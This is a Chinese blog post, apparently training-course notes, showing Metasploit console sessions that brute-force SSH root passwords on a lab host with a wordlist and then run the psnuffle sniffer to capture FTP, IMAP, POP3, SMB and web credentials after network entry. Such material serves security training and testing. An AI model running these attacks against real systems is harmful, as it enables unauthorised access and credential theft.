zoukankan      html  css  js  c++  java
  • MSF魔鬼训练营-3.3.2 口令猜测与嗅探

    密码暴力破解以SSH为例,其他协议方法类似
    SSH
         msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > set rhosts 192.168.3.199
    rhosts => 192.168.3.199
    msf auxiliary(ssh_login) > set username root
    username => root
    msf auxiliary(ssh_login) > set pass_file /root/pass.txt
    pass_file => /root/pass.txt
    msf auxiliary(ssh_login) > set threads 100
    threads => 100
    msf auxiliary(ssh_login) > run
     
    [*] SSH - Starting bruteforce
    [-] SSH - Failed: 'root:19500101an'
    [-] SSH - Failed: 'root:19500101ba'
    [-] SSH - Failed: 'root:19500101bai'
    [-] SSH - Failed: 'root:19500101ban'
    [-] SSH - Failed: 'root:19500101bao'
    [-] SSH - Failed: 'root:19500101bei'
    [-] SSH - Failed: 'root:19500101bi'
    [-] SSH - Failed: 'root:19500101bian'
     

    在计入对方网络的初始访问点后才能够方便的使用psnuffle模块进行口令嗅探。条件允许的话再介入网络的整个过程都要保持嗅探器的运行。增加截获口令的可能性。
    msf > use auxiliary/sniffer/psnuffle
    msf auxiliary(psnuffle) > show options
     
    Module options (auxiliary/sniffer/psnuffle):
     
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       FILTER                      no        The filter string for capturing traffic
       INTERFACE                   no        The name of the interface
       PCAPFILE                    no        The name of the PCAP capture file to process
       PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
       SNAPLEN    65535            yes       The number of bytes to capture
       TIMEOUT    500              yes       The number of seconds to wait for new data
     
     
    Auxiliary action:
     
       Name     Description
       ----     -----------
       Sniffer 
     
     
    msf auxiliary(psnuffle) > run
    [*] Auxiliary module execution completed
    msf auxiliary(psnuffle) >
    [*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
    [*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
    [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
    [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
    [*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
    [*] Sniffing traffic.....
     
     
  • 相关阅读:
    SQL性能--left join和inner join的运行速度与效率
    20分钟搭建selenium+python+pydev+eclipse环境
    python 模拟双色球输出
    python 装饰器
    leetcode python丑数
    leetcode python找不同
    TCP和UDP的区别以及使用python服务端客户端简单编程
    python 上台阶
    leetcode python快乐数
    mysql 两例习题
  • 原文地址:https://www.cnblogs.com/enderzhou/p/7554283.html
Copyright © 2011-2022 走看看